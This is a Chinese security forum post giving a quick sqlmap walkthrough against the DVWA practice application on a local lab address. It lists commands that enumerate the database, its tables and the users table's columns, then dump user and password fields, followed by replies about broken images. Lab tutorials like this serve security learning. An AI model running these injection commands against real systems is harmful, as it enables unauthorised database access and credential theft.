找回密码
立即注册
搜索
热搜: 活动 交友 discuz
网络安全运维技术交流论坛»论坛 网络安全技术交流 Sqlmap注入 sqlmap 快速体验
发新帖
BoSaike

9

积分

0

好友

1

主题

sqlmap 快速体验

发表于 2024-1-9 00:03:47 | 查看: 3359| 回复: 3


- 获取当前数据库

  ```
  sqlmap.py --cookie="security=low; PHPSESSID=9209714ac614f3137b25f92880385a6e" --batch -u "http://192.168.0.110/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --current-db
  ```


  得知数据库名为dvwa

  ![image-20231205181614677](image/image-20231205181614677.png)

- 获取当前数据库下的表

  ```
  sqlmap.py --cookie="security=low; PHPSESSID=9209714ac614f3137b25f92880385a6e" --batch -u "http://192.168.0.110/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --D dvwa --tables
  ```

  ![image-20231205181636230](image/image-20231205181636230.png)

- 获取指定表的字段信息

  ```
  python sqlmap.py --cookie="security=low; PHPSESSID=9209714ac614f3137b25f92880385a6e" --batch -u "http://192.168.0.110/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" -D "dvwa" -T "users" --columns
  ```

  ![image-20231205181720063](image/image-20231205181720063.png)

- dump表中指定字段的数据

  ```
  python sqlmap.py --cookie="security=low; PHPSESSID=9209714ac614f3137b25f92880385a6e" --batch -u "http://192.168.0.110/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" -D dvwa -T users -C "user,password" --dump
  ```

  ![image-20231205181823016](image/image-20231205181823016.png)
发表于 2024-1-9 00:05:04
F:\BaiduSyncdisk\笔记\pentest\工具使用\其他\image\image-20231205181610515.png

回复 显示全部楼层 道具 举报

发表于 2024-1-9 00:05:36
图片插入不好使

回复 显示全部楼层 道具 举报

发表于 2024-1-9 00:45:43
这个是插入图片是无法显示吗,好的等我核实一下

回复 显示全部楼层 道具 举报

返回列表
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

QQ|手机版|小黑屋|网络安全运维技术交流论坛 ( 黔ICP备2021010738号|贵公网安备2021010738号 )

GMT+8, 2026-5-14 20:54 , Processed in 0.097816 second(s), 11 queries , Redis On.

Powered by Discuz! X3.5 Licensed

© 2001-2026 Discuz! Team.

快速回复 返回顶部 返回列表